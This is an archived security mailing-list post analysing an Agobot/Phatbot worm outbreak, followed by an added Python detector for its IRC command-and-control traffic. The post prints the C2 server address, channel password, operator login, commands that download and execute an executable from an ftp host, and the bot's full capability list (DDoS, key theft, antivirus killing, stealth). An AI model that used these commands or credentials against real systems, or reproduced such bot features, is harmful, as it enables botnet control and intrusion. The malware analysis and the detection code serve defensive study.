lists.openwall.net - Open Source and information security mailing list archives
From: isec at europe.com (Willem Koenings)
Subject: Re: Outbreak of a virus on campus

----- Original Message -----
From: "Morning Wood"
Date: Sat, 24 Apr 2004 18:37:31 +0000
To: mueller@...net.com, full-disclosure@...ts.netsys.com
Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus

> phatbot?

This one is yet another Agobot. It has a long list of useful commands (included at the end of this posting, if someone is interested...), polymorph capability, stealth capability (hides its own process in memory and its binary from listing), is capable of updating itself via ftp/http, has a list of servers for evaluating connection speed, steals cdkeys, sniffs the wire, performs DDoS, is capable of installing a proxy, sends spam via AOL, can install identd, has a LONG list of various processes to kill (mostly AV, but also regedit and tcpview among others), retrieves sysinfo, makes screenshots etc. etc. etc. - looks similar to the other good household bots :)

What makes it interesting is its stealth capability and propagation. It has the following scanning/propagation subroutines:

CScannerBagle
CScannerBase
CScannerDCOM
CScannerDoom
CScannerDW
CScannerHTTP
CScannerNetBios
CScannerOptix
CScannerSQL
CScannerUPNP
CScannerWKS

When the worm is started, it connects to the irc server 193.87.20.31 (irc.weednet.net) port 7000. Then it joins the password-protected channel #1337; the password is heyho. As the channel topic is .scan.startall, it accepts the command and starts scanning right away.

I took my trusty irc client and joined that channel myself. Right away the admin gave me these commands:

<admin> .login stebo jamesbond007 -s
<admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe %TEMP%\xgf.exe BLAOR12
<admin> .scan.stop
<admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe c:\xgf.exe BLAOR12

Seems like my 'bot' version was too old :)

have fun :)

W.

-----------------------
Commands and parameters (all commands start with . (dot)):

irc.screencap - takes a screenshot of the active desktop
irc.server - changes the server the bot connects to
irc.reconnect - reconnects to the server
irc.raw - sends a raw message to the irc server
irc.quit - quits the bot
irc.privmsg - sends a privmsg
irc.part - makes the bot part a channel
irc.netinfo - prints netinfo
irc.mode - lets the bot perform a mode change
irc.join - makes the bot join a channel
irc.gethost.join - makes the <host> bots join the channel you want
irc.getedu.join - makes the .edu bots join the channel you want
irc.gethost - prints netinfo when host matches
irc.getedu - prints netinfo when the bot is .edu
irc.dccsend - sends a file over dcc
irc.action - lets the bot perform an action
irc.disconnect - disconnects the bot from irc
bot.command - runs a command with system()
bot.unsecure - enable shares / enable dcom
bot.secure - delete shares / disable dcom
bot.flushdns - flushes the bot's dns cache
bot.quit
bot.highspeed - if speed > 5000 then the bot will respond
bot.longuptime - if uptime > 7 days then the bot will respond
bot.sysinfo - displays the system info
bot.status - gives status
bot.rndnick - makes the bot generate a new random nick
bot.removeallbut - removes the bot if id does not match
bot.remove - removes the bot
bot.open - opens a file (whatever)
bot.nick - changes the nickname of the bot
bot.id - displays the id of the current code
bot.execute - makes the bot execute a .exe
bot.dns - resolves ip/hostname by dns
bot.die - terminates the bot
bot.about - displays the info the author wants you to see
shell.disable - disable shell handler
shell.enable - enable shell handler
shell.handler - fallback handler for shell
commands.list - lists all available commands
plugin.unload - unloads a plugin (not supported yet)
plugin.load - loads a plugin
cvar.saveconfig - saves config to a file
cvar.loadconfig - loads config from a file
cvar.set - sets the content of a cvar
cvar.get - gets the content of a cvar
cvar.list - prints a list of all cvars
inst.svcdel - deletes a service from scm
inst.svcadd - adds a service to scm
inst.asdel - deletes an autostart entry
inst.asadd - adds an autostart entry
logic.ifram - exec command if RAM total is bigger than specified (RAM)
logic.ifdiskfree - exec command if free disk space available is bigger than specified (GB)
logic.ifcpu - exec command if the processor's CPU speed is bigger than specified (MHz)
logic.ifedu - exec command if bot is an edu
logic.ifspeed - exec command if speed (via speedtest) is bigger than specified
logic.ifuptime - exec command if uptime is bigger than specified
login - logs the user in
mac.logout - logs the user out
delay.minutes - delays a command a set amount of minutes
ftp.update - executes a file from a ftp url
ftp.execute - updates the bot from a ftp url
ftp.download - downloads a file from ftp
http.command - reads command(s) from a specified url
http.visit - visits an url
http.update - executes a file from a http url
http.execute - updates the bot from a http url
http.download - downloads a file from http
HttpCommand.Net - HttpCommand
file.find - finds a file (not added yet)
file.list - lists contents of a directory
file.rmdir - deletes a directory
file.mkdir - creates a directory
file.move - moves a file
file.delete - deletes a file
rsl.logoff - logs the user off
rsl.shutdown - shuts the computer down
rsl.reboot - reboots the computer
pctrl.killpid - kills a pid
pctrl.killsvc - deletes/stops a service
pctrl.listsvc - lists all services
pctrl.kill - kills a process
pctrl.list - lists all processes
http.speedtest - speed test to see how fast the bot is
scan.stats - displays stats of the scanner
scan.stop - signal stop to child threads
scan.start - signal start to child threads
scan.stopall - disable all scanners and stop scanning
scan.startall - enable all scanners and start scanning
scan.disable - disables a scanner module
scan.enable - enables a scanner module
scan.resetnetranges - resets netranges to the localhost
scan.clearnetranges - clears all netranges registered with the scanner
scan.listnetranges - lists all netranges registered with the scanner
scan.delnetrange - deletes a netrange from the scanner
scan.addnetrange - adds a netrange to the scanner
ddos.stop - stops all floods
redirect.stop - stops all redirects running
redirect.socks - starts a socks4 proxy
harvest.cdkeys - makes the bot get a list of cdkeys
bot.repeat

cvars:

inst_polymorph - Installer - Polymorph on install?
vuln_channel - Vuln Daemon Sniffer Channel
sniffer_channel - Sniffer - Output channel
sniffer_enabled - Sniffer - Enabled?
spam_aol_enabled - AOL Spam - Enabled?
spam_aol_channel - AOL Spam - Channel name
scaninfo_level - Info level 1 (less) - 3 (more)
scaninfo_chan - Scanner - Output channel
cdkey_windows - Return Windows product keys on cdkey.get
identd_enabled - IdentD - Enable the server
redir_maxthreads - Redirect - Maximum number of threads
ddos_maxthreads - DDOS - Maximum number of threads
scan_maxsockets - Scanner - Maximum number of sockets
scan_maxthreads - Scanner - Maximum number of threads
as_service_name - Autostart - Short service name
as_service - Autostart - Start as service
as_enabled - Autostart - Enabled
as_valname - Autostart - Value name
do_stealth - Bot - Enable stealth
do_avkill - Bot - Enable AV kill
do_speedtest - Bot - Do speedtest on startup
bot_topiccmd - Bot - Execute topic commands
bot_mutex_name - Bot - Mutex name
bot_mutex - Bot - Create mutex
bot_meltserver - Bot - Melt the original server file
bot_randnick - Bot - Random nicks of letters and numbers
bot_compnick - Bot - Use the computer name as a nickname
bot_seclogin - Bot - Enable login only by channel messages
bot_timeout - Bot - Timeout for receiving in milliseconds
bot_prefix - Bot - Command prefix
bot_id - Bot - Current ID
bot_filename - Bot - Runtime filename
bot_version 0.3.0 - Bot - Version
si_nick - Server Info - Nickname
si_usessl - Server Info - Use SSL?
si_servpass - Server Info - Server password
si_server - Server Info - Server address
si_port - Server Info - Server port
si_nickprefix - Server Info - Nickname prefix
si_mainchan - Server Info - Main channel
si_chanpass - Server Info - Channel password
bot_ftrans_port_ftp - Bot - File transfer port for FTP
bot_ftrans_port - Bot - File transfer port
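Detection of the command-and-control pattern the post describes, as an added example in Python (not code from the original post and not the bot's own code): a small parser for raw IRC protocol lines that flags a keyed JOIN, a channel topic that is itself a bot command (what the bot_topiccmd cvar above enables), PRIVMSGs that use the "." prefix with one of the command namespaces from the list above, a cleartext .login issued in channel, and update URLs carrying embedded ftp credentials. The sample traffic is constructed for this example; it reuses the channel, key and topic the post reports, while the nick, the speaking users' hostmasks and the ftp host are made up.

```python
"""Flag Agobot/Phatbot-style IRC C2 activity in raw IRC protocol lines.

Assumptions (not from the original post): input is one RFC 1459 line per
string, as reassembled from a capture or an IRC proxy log, and the bot
command prefix is "." as the post states. The sample traffic below is
constructed for this example."""

import re
from dataclasses import dataclass, field

# Command namespaces taken from the command list in the post, plus the bare
# "login" command. "<prefix><namespace>.<cmd> ..." is treated as a bot command.
BOT_NAMESPACES = frozenset((
    "irc", "bot", "shell", "commands", "plugin", "cvar", "inst", "logic",
    "mac", "delay", "ftp", "http", "file", "rsl", "pctrl", "scan",
    "ddos", "redirect", "harvest", "login",
))
CMD_PREFIX = "."

# user:pass@host embedded in an ftp:// or http:// URL
URL_CRED_RE = re.compile(r"\b(ftp|http)://([^:/@\s]+):([^@\s]+)@([^\s/]+)")


@dataclass
class Finding:
    kind: str
    detail: str


@dataclass
class Session:
    nick: str = ""
    channels: dict = field(default_factory=dict)   # channel -> key used on JOIN
    findings: list = field(default_factory=list)


def parse_irc_line(line):
    """Split a raw IRC line into (prefix, COMMAND, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        return prefix, "", [], trailing
    return prefix, parts[0].upper(), parts[1:], trailing


def is_bot_command(text):
    """True if text looks like '<prefix><namespace>.<cmd> ...' or '<prefix>login ...'."""
    if not text or not text.startswith(CMD_PREFIX):
        return False
    word = text[len(CMD_PREFIX):].split(" ", 1)[0]
    return word.split(".", 1)[0] in BOT_NAMESPACES


def analyze(lines):
    """Run the detector over IRC lines and return a Session with findings."""
    s = Session()
    for raw in lines:
        _prefix, cmd, params, trailing = parse_irc_line(raw)
        if cmd == "NICK" and params:
            s.nick = params[0]
        elif cmd == "JOIN" and params:
            key = params[1] if len(params) > 1 else ""
            s.channels[params[0]] = key
            if key:
                s.findings.append(Finding("keyed_join", f"{params[0]} key={key}"))
        elif cmd in ("TOPIC", "332") and trailing is not None:
            # 332 is RPL_TOPIC, sent by the server on join; with bot_topiccmd
            # enabled the bot executes the topic text as a command.
            if is_bot_command(trailing):
                s.findings.append(Finding("topic_command", trailing))
        elif cmd == "PRIVMSG" and trailing is not None and is_bot_command(trailing):
            s.findings.append(Finding("bot_command", trailing))
            words = trailing.split()
            if words[0] == CMD_PREFIX + "login" and len(words) >= 3:
                # operator authenticating to the bots in cleartext, in channel
                s.findings.append(Finding("cleartext_login", f"{words[1]}:{words[2]}"))
            m = URL_CRED_RE.search(trailing)
            if m:
                s.findings.append(Finding("url_credentials",
                                          f"{m.group(2)}:{m.group(3)}@{m.group(4)}"))
    return s


# Constructed sample traffic (hostmasks and ftp host are made up).
SAMPLE_TRAFFIC = [
    "NICK xgf-ab12cd",
    "USER xgf 0 * :xgf",
    "JOIN #1337 heyho",
    ":irc.weednet.net 332 xgf-ab12cd #1337 :.scan.startall",
    ":admin!admin@example.invalid PRIVMSG #1337 :.login stebo jamesbond007 -s",
    ":admin!admin@example.invalid PRIVMSG #1337 :.ftp.update "
    "ftp://ftp:bla@ftp.example.invalid/incoming/dt.exe %TEMP%\\xgf.exe BLAOR12",
    ":admin!admin@example.invalid PRIVMSG #1337 :.scan.stop",
    ":bob!bob@example.invalid PRIVMSG #1337 :hello, is this channel about anything?",
]

if __name__ == "__main__":
    session = analyze(SAMPLE_TRAFFIC)
    for f in session.findings:
        print(f"{f.kind:16} {f.detail}")
```

Feed it the client-to-server and server-to-client lines of a TCP stream to port 7000 (or whatever the capture shows) reassembled with a stream follower; matching the server address itself is left to the capture filter, since a bot is trivially repointed with irc.server. The ordinary chat line in the sample does not match because it neither starts with the prefix nor names a known namespace.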